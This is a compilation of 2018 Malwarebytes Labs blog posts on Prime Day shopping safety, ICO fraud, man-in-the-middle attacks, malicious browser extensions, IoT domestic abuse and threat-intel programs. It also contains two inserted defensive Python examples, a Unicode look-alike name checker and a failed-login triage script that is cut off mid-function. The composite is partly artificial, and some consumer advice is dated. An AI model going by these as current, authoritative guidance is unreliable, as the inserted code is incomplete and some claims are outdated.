Malware Bytes

A primer: How to stay safe on Amazon’s Prime Day Sale

Malware Bytes Security - Sun, 07/15/2018 - 1:34pm

Bank card—check!

Shopping list—check!

Lumbar back support pillow—check!

Noise canceling headphones—check!

And, of course, coffee—check!

If you’re an Amazon shopper, then you know by now that Prime Day is nigh!

And by that, we mean “tomorrow.”

If you’re one of the many who dreads bidding the weekend goodbye, this is probably the one Monday of the year you look forward to.

It’s true that Amazon Prime Day isn’t your regular Thanksgiving shopping event, but it has become so massive so quickly that it has produced one unintended consequence: catching the attention of online threat actors.

A very big deal

Amazon launched Prime Day in 2015 during the company’s 20th anniversary. And they have been stepping up their game ever since. To date, Prime Day 2017 was hailed as the biggest shopping event in the company’s history, surpassing its 2016 Black Friday and Cyber Monday revenue.

Orders placed via mobile devices also spiked, thanks to the Amazon app that many users have downloaded and installed just for Prime Day. Of course, overall increased sales also translate to increased profits for small businesses around the world. In case you’re not aware, a huge chunk of sellers on Amazon are small businesses.

It would be no surprise if Prime Day 2018 turned out to be bigger than last year’s, and cybercriminals may be counting on this.

Your Amazon Prime Day security reminder list: Do’s and don’ts

Regular readers of the Malwarebytes Labs blog know that Amazon has been used in several threat campaigns to target users. In 2015 and 2016, we documented spam emails circulating the web bearing the Amazon logo; their ruses ranged from asking users to confirm their account information, to filling in a survey in exchange for a small fortune, to redeeming a soon-to-expire $100 Amazon Prime credit.

Then in 2017, Mark Jones (writing for Kim Komando) reported on a phishing email that Kim herself received almost a month after Prime Day ended. According to the post, the email offers recipients a $50 voucher as a bonus for reviewing a product they recently bought on Prime Day. Clicking the link in the email body redirects to a fake Amazon login page.

More fake Amazon emails could materialize from here on. But these shouldn’t get in the way of someone using or trying out Amazon’s services for the first time, or any e-commerce site’s, for that matter. These sites not only afford us the ease and comfort of shopping while remaining in bed in our pajamas, but they also offer selections we cannot otherwise find in the brick-and-mortar shops in town.

If you enjoy shopping on Amazon, protect yourself by protecting your account credentials and shopping transactions. Below is a list of do’s and don’ts you should keep handy alongside your shopping list.


…download only the legitimate Amazon app from the Google Play and Apple App stores, which you can find here and here, respectively. In doing so, you’ll avoid confusion about which app to install (there are several variants) and which to trust (there may be impersonators). Threat actors targeting mobile users have become craftier in their tactics, the latest being the use of Unicode, which lets fake apps trading on famous names pass through security scans.



Read: Phony WhatsApp used Unicode to slip under Google’s radar
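As an added example (not Malwarebytes’ code, nor anything taken from the linked post), here is a defender-side check for Unicode look-alike publisher or app names of the sort a store reviewer or a cautious user could run before trusting a listing. The brand allow-list, the confusables table and the sample names are small constructed ones.

```python
"""Flag app or publisher names that impersonate a known brand via Unicode tricks.

Catches three common tricks: invisible/format characters (zero-width spaces,
soft hyphens) inserted into a brand name, non-breaking or unusual spaces
appended to it, and visually confusable letters borrowed from other scripts
(e.g. Cyrillic 'а' in place of Latin 'a'). The confusables table is a small
hand-built subset; Unicode's full confusables.txt is far larger.
"""
import unicodedata

# Hypothetical allow-list: brand keyword -> the exact publisher string expected.
KNOWN_BRANDS = {
    "whatsapp": "WhatsApp Inc.",
    "amazon": "Amazon Mobile LLC",
}

# Small hand-built map of look-alike characters to their Latin equivalents.
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "\u0440": "p",  # Cyrillic small er
    "\u0441": "c",  # Cyrillic small es
    "\u0445": "x",  # Cyrillic small ha
    "\u0410": "A",  # Cyrillic capital A
    "\u0456": "i",  # Cyrillic small Byelorussian-Ukrainian i
    "\u03bf": "o",  # Greek small omicron
    "\u0131": "i",  # Latin small dotless i
}


def skeleton(name):
    """Reduce a display name to a comparable lower-case skeleton.

    Steps: NFKC fold (full-width letters, ligatures), drop format characters
    (category Cf: zero-width joiner/space, soft hyphen, ...), collapse every
    Unicode space variant (category Zs, including U+00A0 no-break space) into
    one plain space, map confusable letters, then trim and lower-case.
    """
    folded = unicodedata.normalize("NFKC", name)
    out = []
    for ch in folded:
        cat = unicodedata.category(ch)
        if cat == "Cf":
            continue
        if cat == "Zs":
            out.append(" ")
            continue
        out.append(CONFUSABLES.get(ch, ch))
    return " ".join("".join(out).split()).lower()


def suspicious_chars(name):
    """Return (position, U+XXXX, category) for every non-ASCII or format char."""
    findings = []
    for i, ch in enumerate(name):
        cat = unicodedata.category(ch)
        if ord(ch) > 0x7F or cat == "Cf":
            findings.append((i, f"U+{ord(ch):04X}", cat))
    return findings


def check_publisher(display_name):
    """Classify a publisher/app name against the brand allow-list.

    Returns one of:
      ("ok", brand)         the exact expected publisher string
      ("lookalike", brand)  skeleton matches a brand but the raw string does not
      ("unknown", None)     no brand match at all
    """
    for brand, expected in KNOWN_BRANDS.items():
        if display_name == expected:
            return ("ok", brand)
    sk = skeleton(display_name)
    for brand, expected in KNOWN_BRANDS.items():
        if sk == skeleton(expected) or sk.startswith(brand):
            return ("lookalike", brand)
    return ("unknown", None)


if __name__ == "__main__":
    # Constructed samples, not taken from any real store listing.
    samples = [
        "WhatsApp Inc.",                 # genuine
        "WhatsApp Inc.\u00a0",           # trailing no-break space
        "What\u200bsApp Inc.",           # zero-width space inside the name
        "\u0410m\u0430zon Mobile LLC",   # Cyrillic A and a
        "Some Indie Dev",                # unrelated publisher
    ]
    for s in samples:
        verdict, brand = check_publisher(s)
        print(f"{verdict:9s} {brand!s:9s} {suspicious_chars(s)}  {s!r}")
```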

…set up two-factor authentication (if you haven’t already). This is for added security, of course. If you’re the type of shopper who takes their time, you may find it annoying to re-enter your credentials and authentication code multiple times, but having this enabled is well worth it.

…use your credit card when paying for purchases as much as you can. This is because credit card purchases are insured by the bank, while debit card purchases are not. Although a type of consumer protection called a chargeback is in place, it is not a legal protection. This means that your card provider may or may not grant a chargeback, depending on the case.

…look at emails purportedly originating from Amazon with a critical eye. It’s a prevention habit we should all practice when handling email, as doing so will save you a lot of headaches and firefighting in the long run.

…familiarize yourself with how to report phishing emails and pages to Amazon. Why? Because fellow shoppers may not be quick enough to spot the fake email you just spotted. Amazon has a handy guide that walks users through the reporting process on this Help & Customer Service page.

…buy items from sellers you trust or are comfortable with. Like any other e-commerce site, Amazon has bad sellers, too. And by that, we mean those who (1) impersonate legitimate companies by stealing their brand and the showcase of products they sell, (2) purport to sell products but never ship them and run off with your money, or (3) sell you counterfeit or knock-off goods. If you don’t know which seller to trust, check out the third-party supplier’s Amazon page and see when the profile was created. Scam sellers are generally those that just launched and suddenly offer pages upon pages of products spanning unrelated industries, illustrated with random images stolen from several real sellers. Also, watch out for third-party sellers with too-good-to-be-true glowing reviews, as (1) they may have been auto-generated by bots or (2) they’re paid reviews designed to put the seller in a favorable light.


…reuse passwords. If the Amazon account password you’re using now is the same as your, say, Twitter password, it’s time to change that. You’re just making it easy for criminals to access two or more of your online accounts.

…enable macros. An “Amazon” email has convinced you that it’s real. You open the attachment. It asks you to turn on macros. This is the point to stop, because doing what it tells you leads to one of two outcomes: one, nothing happens; two, you’ve just infected your computer with malware. Think about that.

…fall for Amazon gift card scams. We rarely read about this, but it happens. Usually, questionable sellers ask prospective buyers to pay for an item outside of Amazon in the form of gift cards. If a seller suddenly asks you to do this, disengage from the conversation and report them to Amazon immediately.

…use public Wi-Fi to shop. You’re only exposing yourself to MitM attacks. It’s better to shop at home or (we know you do this) at work during your break time.

If we make it a point to address our (potential) security issues first and make mental notes of the rest in our list, then Prime Day 2018 shouldn’t be that stressful. Perhaps.

So, what are you waiting for? Ready, set, shop!


The post A primer: How to stay safe on Amazon’s Prime Day Sale appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Block all or nothing to prevent ICO fraud?

Malware Bytes Security - Thu, 07/12/2018 - 1:00pm

At Malwarebytes, we feel we have reached a point where we need to ask our customers how to proceed on the subject of ICO scams. Asking for your opinion may seem strange to some of you, but Malwarebytes comes from a community of mutual help and trust. If you were unaware of this, reading how our CEO got involved in the anti-malware business is a good way to get acquainted with the cornerstones this company was built on.

To elaborate on what we need your help with, we will need to explain a bit of the background, so bear with us.

What is an ICO?

ICO is short for Initial Coin Offering, which is, in fact, a method of crowdfunding used for many crypto-related projects. The founders of a new company offer shares of their own blockchain product for sale in exchange for established cryptocurrencies like Bitcoin, Ether, or Monero. The funds they gather provide the capital to get their company up and running. Once the company is successful, the “coins” bought by the investors will be worth more than what they paid for them.

That is how it should go, but what we see over and over is that the people who initiated the crowdfunding grab the investments and are never heard from again. Or we see them at a later time, under a different name, repeating the same procedure. Some of these imposters use templates that they reuse for every fake ICO. These templates are for:

  • Creating an account at the Ethereum blockchain
  • The packet script for the blockchain
  • The sites to promote their new product
  • Advertising campaigns to get people to visit that site
  • Accounts on bitcoin-related forums to promote the ICO
  • The whitepapers explaining the goals and targets

To put this into perspective, it might also be good to mention that a recent study showed that only 8% of ICOs managed to trade on an exchange. So, even if we consider only 80% of them to be scams, the chances of investors losing their money are much higher.

How to spot ICOs that might be fraudulent?

There are a few questions you can use to decide for yourself whether an ICO is worth your hard-earned money:

  • Do the people behind the ICO actually exist?
  • Does the plan they have make sense?
  • Is the earning model realistic?
  • Does the team behind the ICO answer questions about their plans?
  • How far along are they in the development of their currency? Do they have safe wallets, etc.?
  • Do they stipulate that US participants need to be accredited investors?

The problem at hand

We have been seeing a lot of ICOs that are nothing short of scams, and we would like to protect our customers against them. But if we wait until we can prove that they are scams, it’s probably too late and the crooks have run off with the investments. So we would need to be more proactive.

Are we alone in this battle? We certainly are not.

What do we ask of you?

Please let us know in the comments section below this post whether you feel we should block ICO advertisements, all ICO related sites, or leave it up to our customers to decide for themselves.

Please take note that users of our Chrome or Firefox extensions may already see some of these sites being blocked. This is because the extensions are behavior-based and may have spotted a scam for you.

If your comment does not show up immediately, you may be able to find the reason in this post: Did my comment on your blog get lost?

The post Block all or nothing to prevent ICO fraud? appeared first on Malwarebytes Labs.


When three isn’t a crowd: Man-in-the-Middle (MitM) attacks explained

Malware Bytes Security - Thu, 07/12/2018 - 12:42pm

Gone are the days when eavesdropping was just the stuff of spies and the town gossip. In fact, it has evolved to become everyone’s favorite pastime. Thanks to the internet, it is now easier than ever to idle by and catch juicy information, compared to pressing your ear against your neighbor’s wall.

While we can easily forgive and forget listeners within earshot when we’re having conversations in public, digital eavesdropping, on the other hand, raises the privacy red flag to new heights. And it can quickly be done by taking advantage of two things: one, our penchant for connecting to Wi-Fi networks (whether they’re insecure or not, whether they’re for public use or private use); and two, the exploitation of that Wi-Fi network. Suffice it to say, digital eavesdropping isn’t and shouldn’t be considered a pastime, especially if you have the skills and the means to do so.

And when it comes to eavesdropping online, the term that immediately comes to mind is man-in-the-middle, essentially a scenario wherein a third person places themselves in the middle of two parties communicating with each other. A third wheel, so to speak. However, this person or entity is unseen by the two parties. In fact, they don’t even know that they are in the company of a third wheel.

While we know that eavesdropping is generally a passive exercise (Person C takes the role of listener-observer and does not get involved while Person A and Person B chat), MitM attacks are anything but. On top of snooping, controlling the conversation is required; thus, contact with the targets is inevitable. This makes a MitM attack an active exercise. And such interference demands inventiveness, attention, patience, guile, and the willingness to be as deeply involved as needed to attain the attacker’s goal.

MitM attacks can be aggressive; they are always surreptitious and invasive.

Not to mention worrying and creepy. How can threat actors do this, and why even do it?

MitM attacks involve the unlawful tapping of a network to exploit transactions, conversations, and data transfers on the fly. Threat actors can do this by taking advantage of weaknesses in a network or in any of its elements, such as software (browser, VoIP, etc.).

Many organizations practice what are essentially MitM tactics, whether or not they acknowledge it, so they can monitor their employees. Some do it for advertising purposes, as in the case of Superfish, a piece of software that was pre-installed on Lenovo consumer products.

Governments are also known to run MitM attacks to proactively spy on their citizens, circumvent the security measures of technologies, spy on enemy countries to steal classified information, and steal money from financial institutions based in other countries to fund their projects.

Furthermore, we’ve seen MitM form a large part of the modus operandi of a criminal group that set out to steal from the clients of the private European companies they targeted. They did this by infiltrating target networks to gain access to email accounts, monitoring payment requests from these companies, and then, by impersonation, putting themselves in the middle of the email conversation and instructing clients to send payments to bank accounts the criminal group controls.

Read: How to encrypt your email

Okay, so, we have Wi-Fi eavesdropping and email hijacking as two types of MitM attacks. Are there others?

These are just two of the most common types. Others are:

  • ARP poisoning
  • DNS spoofing
  • Port stealing
  • STP mangling

Note that not all the types we mentioned can be carried out on all kinds of computer networks. For example, ARP poisoning can be done against systems connected via Ethernet in a LAN. However, it cannot be used when attacking remote systems.

There are also different ways a threat actor can perform MitM attacks, such as sniffing, injecting, hijacking, stripping, and filtering.

I’ve read somewhere that MitM comes in many forms. What are they?

There is an attack called man-in-the-browser (MitB), which starts when a piece of malware arrives on a user’s system, runs when the browser runs, and then does its work by modifying banking transactions behind the scenes while maintaining the appearance of legitimacy to the unknowing user. In other words, MitB attacks are built for financial fraud.

MitB attacks are particularly dangerous to users and tricky to spot because criminals can siphon off money even when security controls, mechanisms, and encryption are present on the bank website and the user’s antivirus program is working normally.

Then there’s a type used against mobile devices called man-in-the-mobile (MitMo), also known as man-in-the-phone. Like MitB, this is also malware, and its purpose is specifically to circumvent SMS two-factor authentication. It does this by monitoring incoming messages for transaction authentication numbers (TANs) and other verification codes sent to users via SMS. Android users are mainly targeted by MitMo malware like SpyEye and ZeuS. CatchApp, an app capable of stealing encrypted chat messages from WhatsApp, is another example of software that can perform MitM attacks on mobile devices.

Still in the realm of mobile, we now have the relatively new type called man-in-the-app, wherein an attacker can use a self-signed certificate to communicate directly with a compromised app.

Then we have MitM for the cloud and for the Internet of Things, appropriately called man-in-the-cloud and man-in-the-IoT, respectively.

Are MitM attacks still happening?

Yes. They’re quite prevalent, actually. Some types of MitM attacks are easy to do, and there are readily available hacking tools a budding threat actor can use to set up an attack. It’s even possible (if not highly likely) for insider threats in a company to conduct such attacks within the organization’s intranet.

Unfortunately, detecting most of the MitM attack types is difficult. Therefore, nipping such attacks in the bud through prevention is still very important. And preventive measures against this type of attack also enhance a network’s security and privacy.

Since prevention is better than cure in this case, what are the ways to protect me from MitM attacks?

  • Avoid using public Wi-Fi networks, if you can, especially if they are not password-protected. If you do use secure Wi-Fi, limit your use to browsing, reading, and other activities that don’t involve entering your credentials.
  • Like we always say, log out of secured sessions whenever you’re not using them. The majority of social networks do this automatically the moment you kill the browser or close its tab, but it still pays to log out manually from others.
  • If possible, access only websites sporting the green lock, i.e., those using the HTTPS protocol. Also, install apps or extensions such as HTTPS Everywhere, which force the browser to visit the secured versions of the websites you visit.
  • Enable multi-factor authentication on accounts wherever this option is available.
  • If possible, install and use a virtual private network (VPN) when conducting your sensitive transactions and communications online, or if you absolutely feel the need to use a public Wi-Fi connection.
  • Look out for potential phishing emails asking you to update your passwords. In line with this, also be wary of emails carrying attachments, which could be malware that exposes you to MitM attacks.
  • Make sure that your home router is configured securely as well. You can do this by changing the default router username and password to unique, strong ones.


The post When three isn’t a crowd: Man-in-the-Middle (MitM) attacks explained appeared first on Malwarebytes Labs.


We block shady ad blockers

Malware Bytes Security - Wed, 07/11/2018 - 2:15pm

Some of you have reached out to us concerning Malwarebytes blocking certain ad blocking extensions, or an influx of web blocking notifications. First things first: this is not a false positive. AdGuard recently reported on its blog that numerous malicious ad blocking extensions had been found in the Google Chrome store. According to an article by ZDNet, the malicious extensions have since been removed from the store; however, an estimated 20 million devices downloaded these extensions while they were still online, and you might own one of those devices.

The extensions basically turn the browser into a zombie under the control of a remote attacker, essentially adding your device to a botnet. Since we are limited in our ability to remove extensions completely, we are blocking the domains the malicious extensions reach out to, so that, at the very least, users will not have their systems controlled by cybercriminals.

If you are consistently getting pop-ups like the one above, you may be running one of the malicious extensions. Here is the full list:

  • AdRemover for Google Chrome
  • uBlock Plus
  • Adblock Pro
  • HD for YouTube
  • Webutation

If so, your best option is to remove it from your browser.

Check out our guide on adware, which includes a section on extension removal.

Take a look at the names of some of these “extensions.” Notice anything? Adblock Pro, uBlock, YouTube: all big names and buzzwords that make these extensions seem more legitimate. Add in the fact that fake comments and reviews are created all the time for these types of tools, and at the end of the day the criminal is counting on you not realizing that “this is not the app you are looking for.”

Please be mindful of what you install in your browser and on your computer overall. It’s just like those cheap DVDs you might find at the shop, whose titles are so similar to a big blockbuster film that folks who aren’t familiar with the source material overlook the fact that they are buying a knock-off. Think of extensions, plugins, and add-ons for your browser the same way: there are some really great ones out there, but there are a LOT of shady copycats.

Be sure to check user reviews, download numbers, and even outside recommendations (searching for “best ad blocker” might be a good place to start). This will help make sure you’ve installed the right tool, one that will do the best job.

Thanks for reading, safe surfing, see you next time!

The post We block shady ad blockers appeared first on Malwarebytes Labs.


IoT domestic abuse: What can we do to stop it?

Malware Bytes Security - Wed, 07/11/2018 - 11:00am

Some 40 years ago, the sci-fi/horror film Demon Seed told the tale of a woman slowly imprisoned by a sentient AI, which invaded the smart home system her husband had designed to manage it. The AI locked doors, windows, turned off communications, and even put a synthesised version of her onscreen at the front door to reassure visitors she was “fine.”

The reality, of course, is that she was anything but. There have been endless works of fiction in which smart technology micromanaging the home environment goes rogue. Sadly, those works of fiction are bleeding over into reality.

In 2018, we suddenly have the real-world equivalent playing out in homes and behind closed doors. We’ll talk about the present-day problems momentarily, but first let’s take a look at how we got here by casting our eye back about 15 years.

PC spyware and password theft

For years, a subset of abusive partners with technical know-how have placed spyware on computers or mobile devices, stolen passwords, and generally kept tabs on their other half. This could often lead to violence, and as a result, many strategies for defending against it have been drawn up over the years. I effectively became involved in security due to a tech-related abuse case, and I’ve given many talks on this subject dating back to 2006 alongside representatives from NNEDV (National Network to End Domestic Violence).

Consumer spyware is a huge problem, and tech giants such as Google are funding programs designed to help abused spouses out of technological abuse scenarios.

The mobile wave and social control

After PC-based spyware became a tool of the trade for abusers, there came an upswing in “coercive control,” the act of demanding to check emails, texts, direct messages and more sent to mobile phones. Abusive partners demanding to see SMS messages has always been a thing, but taking your entire online existence and dumping it into a pocket-sized device was always going to raise the stakes for people up to no good.

Coercive control is such a serious problem that the UK has specific laws against it, with the act becoming a crime in 2015. Should you be found guilty, you can expect to be looking at a maximum of five years’ imprisonment, or a fine, or both in the worst cases. From the description of coercive control:

Coercive or controlling behaviour does not relate to a single incident, it is a purposeful pattern of incidents that occur over time in order for one individual to exert power, control, or coercion over another.

Keep the “purposeful pattern of incidents occurring over time in order for an individual to exert power or control” description in mind as we move on to the next section about Internet of Things (IoT) abuse, because it’s relevant.

Internet of Things: total control

An Internet of Things control hub could be a complex remote cloud service powering a multitude of devices, but for most people, it’s a device that sits in the home and helps to power and control appliances and other systems, typically with some level of Internet access and the possibility of additional control via smartphone. It could just be in charge of security cameras or motion sensors, or it might be the total package: heating and cooling, lighting, windows, door locks, fire alarms, ovens, water temperature—pretty much anything you can think of.

It hasn’t taken long for abusive partners to take advantage of this newly embedded functionality, with numerous tales of them making life miserable for their loved ones, who are effectively trapped in a 24/7 reworking of a sci-fi dystopian home.

Their cruelty is only limited by what they can’t hook into the overall network. Locking the spouse into their place of residence then cranking up the heat, blasting them with cold, flicking lights on and off, disabling services, recording conversations, triggering loud security alarms; the abused partner is almost entirely at their mercy.

There are all sorts of weird implications thrown up by this sort of real-world abuse of technologies and individuals. What happens if someone has an adverse reaction to severe temperature change? An epileptic fit due to rapidly flickering lights? How about someone turning off smoke alarms or emergency police response technology and then the place burns down or someone breaks in?

Someone could well be responsible for a death, but how would law enforcement figure it out, much less know where to pin the blame?

Of course, those are situations where spouses are still living together. There are also scenarios where the couple has separated, but the abuser still has access to the IoT tech and proceeds to mess with their lives remotely. One is somewhat more straightforward to approach than the other, but neither is particularly great for the person on the receiving end.

A daunting challenge

Unfortunately, this is a tough nut to crack. Generally speaking, advice given to survivors of domestic abuse tends to err on the side of extreme caution, because if the abuser notices the slightest irregularity, they’ll seek retribution. With computers and more “traditional” forms of tech-based skullduggery, there are usually a few slices of wiggle room.

For example, an abused partner may have a mobile device, which is immediately out of reach from the abuser the moment they go outside—assuming they haven’t tampered with it. On desktop, Incognito mode browsing is useful, as are domestic abuse websites which offer tips and fast close buttons in case the abuser happens to be nearby.

Even then, though, there’s risk: the abuser may keep network logs or use surveillance software, and attempts to “hide” the browsing data may raise suspicions. In fact, this is one example where websites slowly moving to HTTPS is beneficial, because an abuser can’t see the website data. Even so, they may still see the URLs, and then you’re back to square one.

With IoT, everything is considerably more difficult in domestic abuse situations.

A lot of IoT tech is incredibly insecure because functionality is where it’s at; security, not so much. That’s why you see so many stories about webcams beamed across the Internet, or toys doing weird things, or the occasional Internet-connected toaster going rogue.

The main hubs powering everything in the home tend to be pretty locked down by comparison, especially if they’re a name brand like Alexa or Nest.

In these situations, the more locked down the device, the more difficult it is to suggest evasion solutions for people under threat. They can hardly jump in and start secretly tampering with the technology without notice; frankly, people tend to notice a physical device that isn’t acting as it should far faster than they notice a covert piece of spyware designed to grab emails from a laptop.

All sorts of weird things can go wrong with purchased spyware. Maybe there’s a server it needs to phone home to, but the server is temporarily offline or has been shut down. Perhaps the Internet connection is a bit flaky, and it isn’t sending data back to base. What if the coder wasn’t good and something randomly started to fall apart? There are so many variables involved that a lot of abusers might not know what to do about it.

However, a standard bit of off-the-shelf IoT kit is expected to function in a certain way, and when it suddenly doesn’t? The abuser is going to know about it.

Tackling the problem

Despite the challenges, there are some things we can do to at least gain a foothold against domestic attackers.

1) Keep a record: with the standard caveat that doing action X may attract attention Y, a log is a mainstay of abuse cases. Pretty much everyone who’s experienced this abuse and talks about it publicly will say the same thing: be mindful of how obvious your record is. A notebook may work for some; text obfuscated in code may work for others (though it could attract unwarranted interest if discovered). It may be easier to hide a notebook than to keep them away from your laptop.

Of course, adjust to the situation at hand; if you’re not living with the abusive partner anymore, they’re probably not reading your paper journal kept in a cupboard. How about a mobile app? There are tools that let you record information which isn’t saved on the device, via programs designed to look like weather apps. If you can build up a picture of every time the heating becomes unbearable, or the lights go into overdrive, or alarms start buzzing, this is valuable data for law enforcement.

2) Correlation is a wonderful thing. Many of the most popular devices will keep detailed statistics of use. Nest, for example, “collects usage statistics of the device” (2.1, User Privacy) as referenced in this Black Hat paper [PDF]. If someone eventually goes to the police with their records, and law enforcement are able to obtain usage statistics for (say) extreme temperature fluctuations, or locked doors, or lightbulbs going berserk, then things quickly look problematic for the abuser.

This would especially be the case where device-recorded statistics match whatever you’ve written in your physical journal or saved to your secure mobile app.

3) This is a pretty new problem that’s come to light, and most of the discussions about it in tech circles are filled with tech people saying, “I had no idea this was a thing until now.” If there is a local shelter for abused spouses and you’re good with this area of tech/security/privacy, you may wish to pop in and see if there’s anything you could do to help pass on useful information. It’s likely they don’t have anyone on staff who can help with this particular case. The more we share with each other, the more we can support abused partners to overcome their situations.

4) If you’ve escaped an abusive spouse but you’ve brought tech with you, there’s no guarantee it hasn’t been utterly compromised. Did both of you have admin access to the devices? Have you changed the password(s) since moving? What kind of information is revealed in the admin console? Does it mention IP addresses used, perhaps geographical location, or maybe a new email address you used to set things up again? If you’ve been experiencing strange goings on in your home since plugging everything back in, and they resemble the type of trickery listed up above, it’s quite possible the abusive partner is still up to no good.

We’ve spotted at least one example where an org has performed an IoT scrub job. The idea of “ghosting” them, that is, keeping at least one compromised device running to make the abuser think all is well, is an interesting one, but potentially not without risk. If it’s at all possible, our advice is to trash all pieces of tech brought along for the ride. IoT is such a complex thing to set up, with so many moving parts, that it’s impossible to say for sure that everything has been technologically exorcised.

No quick fix

It’d be great if there was some sort of technological magic bullet that could fix this problem, but as you’ll see from digging around the “IoT scrub job” thread, a lot of security pros are only just starting to understand this type of digitized assault, as well as the best ways to go about combatting it. As with all things domestic abuse, caution is key, and we shouldn’t rush to give advice that could potentially put someone in greater danger. Frustratingly, a surprising number of the top results in search engines for help with these types of attack result in 404 error pages or websites that simply don’t exist anymore.

Clearly, we all need to up our game in technology circles and see what we can do to take this IoT-enabled horror show out of action before it spirals out of control. As IoT continues to integrate itself into people’s day-to-day existence, in ways that can’t easily be ripped out afterwards, the potential for massive harm to the most vulnerable members of society is staring us in the face. We absolutely must rise to the challenge.

The post IoT domestic abuse: What can we do to stop it? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

So you’ve been asked to start a threat intel program

Malware Bytes Security - Tue, 07/10/2018 - 11:00am

Ever since the Mandiant APT1 report landed like a bomb in private sector security reporting, threat intelligence has been a hot buzzword many companies have been chasing.  But what is threat intelligence?  What do you need to execute it well?  And how many new tools do you need to buy?  The ambiguity around these questions leaves many people wondering “How on earth do I start a threat intel program?”

Maybe don’t?

Threat intelligence is a very new, very popular buzzword in the security industry.  But as a capability, it’s both very expensive, and meant to sit on top of a mature security program.  Do you have mitigations in place against the OWASP top 10?  Have you vetted your existing vendors for efficacy?  Do you have a fully staffed and trained SOC, or are your analysts working double shifts?  If you don’t have clear answers to those questions, your security program probably is not mature, and would not really benefit from an additional costly function.

Cost can be a serious concern.  While SOC analysts have a fairly wide spread for salary range, threat intelligence analysts with government training are not that common, resulting in a salary premium.  Below you can see a relatively common private sector intelligence analyst salary as contrasted with a salary for a government trained analyst.

Glassdoor threat intel salaries for the private and public sector

A well trained threat intel analyst embedded in a mature security team can be an outstanding force multiplier, but without a well oiled environment to place them into, they can inflate staffing budgets without providing a significant return on investment.

But I have to

If you must start a threat intel program, the first step is to look for the components you already have.  Spending on threat intel vendors or employees with highly specific experience can lead to astronomical costs, and raises the odds that enterprise leadership won’t find value in the team.  So start small: almost every Tier II SOC has senior members with a wealth of experience in the threat landscape, and an itch for more responsibility. Rather than casting a line into a very tight market for new staff, it’s much more cost effective to send those SOC members to intelligence training, then task them with creating training for everyone else.  Some companies have accomplished this by transitioning SOC staff from monitoring to threat hunting.

Threat hunting – intel you should already be doing

Per Wikipedia, “Cyber threat hunting is the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.”  In practice, what this amounts to is training analysts to tell the entire story of a threat: where did it start, what TTPs were employed in the attack, what systems were touched, and what corroborating information can be gained from public data.  When a responder is trained to tell the full story of a threat in this manner, organizations can not only respond to a threat, but can also learn from it and adjust mitigations accordingly.

Tools you need and tools you don’t

First and foremost, you do not need a third party threat intelligence feed.  It’s a nice-to-have, but the reality is that external vendors cannot provide data specific to your company, and frequently struggle to offer relevant data filtered by industry vertical.  Vastly more important is to make appropriate use of the data you have.  Here’s a non-comprehensive list of data that many companies collect, but don’t exploit effectively:

  • Malicious spam can be used to pinpoint types of threats specific to the organization, as well as relative popularity of exploits used
  • Log review is commonly done as part of after action reports associated with a breach.  But they can also be used proactively to review patterns of activity, and adjust mitigations accordingly.
  • Password failures.  If a threat actor is attempting to brute force an account, is it a dictionary attack or have the credentials previously been valid on the system?  Looking at use of outdated passwords can pinpoint a past data leak, or give visibility into how stolen company data is disseminated out to threat actors.

Reviewing internal data for threat intelligence can be much more effective than a third party feed because all internal data is by definition tailored to your company’s specific threat profile.  It also costs nothing, which doesn’t hurt.
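To make the “password failures” bullet concrete, here is an added example (not code from the post or from Malwarebytes) that triages failed-login events from a constructed log sample. The log format, the `reason=` field and the idea that the authentication system records a `retired-password` hit when a failed attempt matches an account’s password history are all assumptions made for this example. It separates sources that are spraying one guess across many accounts, sources hammering one account, and sources that are replaying old, previously valid credentials, which is the signal the post says can point to a past leak.

```python
"""Triage failed logins: password spray vs. brute force vs. reuse of retired credentials."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample log lines in a hypothetical format (not from any real product).
# 'reason=retired-password' assumes the auth system compares failed attempts against
# each account's stored password history and records a hit.
SAMPLE_LOG = """\
2018-07-10T09:00:01Z auth-fail src=203.0.113.7 user=alice reason=bad-password
2018-07-10T09:00:01Z auth-fail src=203.0.113.7 user=bob reason=bad-password
2018-07-10T09:00:02Z auth-fail src=203.0.113.7 user=carol reason=bad-password
2018-07-10T09:00:02Z auth-fail src=203.0.113.7 user=dave reason=unknown-user
2018-07-10T09:00:03Z auth-fail src=203.0.113.7 user=erin reason=bad-password
2018-07-10T09:00:03Z auth-fail src=203.0.113.7 user=frank reason=bad-password
2018-07-10T09:05:10Z auth-fail src=198.51.100.23 user=alice reason=retired-password
2018-07-10T09:05:11Z auth-fail src=198.51.100.23 user=bob reason=retired-password
2018-07-10T09:05:12Z auth-fail src=198.51.100.23 user=carol reason=retired-password
2018-07-10T09:07:00Z auth-fail src=192.0.2.44 user=alice reason=bad-password
2018-07-10T09:07:01Z auth-fail src=192.0.2.44 user=alice reason=bad-password
2018-07-10T09:07:02Z auth-fail src=192.0.2.44 user=alice reason=bad-password
2018-07-10T09:07:03Z auth-fail src=192.0.2.44 user=alice reason=bad-password
2018-07-10T09:07:04Z auth-fail src=192.0.2.44 user=alice reason=bad-password
2018-07-10T09:30:00Z auth-fail src=192.0.2.99 user=grace reason=bad-password
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth-fail src=(?P<src>\S+) user=(?P<user>\S+) reason=(?P<reason>\S+)$"
)


@dataclass
class SourceStats:
    attempts: int = 0
    users: set = field(default_factory=set)
    retired_hits: int = 0
    unknown_users: int = 0


def parse_events(log_text):
    """Return one dict per well-formed auth-fail line; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def aggregate_by_source(events):
    """Roll events up per source IP: attempt count, distinct users, reason tallies."""
    stats = defaultdict(SourceStats)
    for ev in events:
        s = stats[ev["src"]]
        s.attempts += 1
        s.users.add(ev["user"])
        if ev["reason"] == "retired-password":
            s.retired_hits += 1
        elif ev["reason"] == "unknown-user":
            s.unknown_users += 1
    return stats


def classify(stats, spray_users=5, brute_attempts=5):
    """Label each source 'credential-reuse', 'password-spray', 'brute-force' or 'noise'.

    Thresholds are illustrative; tune them to your own baseline of failed logins.
    """
    verdicts = {}
    for src, s in stats.items():
        if s.retired_hits and s.retired_hits >= s.attempts * 0.5:
            verdicts[src] = "credential-reuse"  # old passwords being replayed: look for a leak
        elif len(s.users) >= spray_users:
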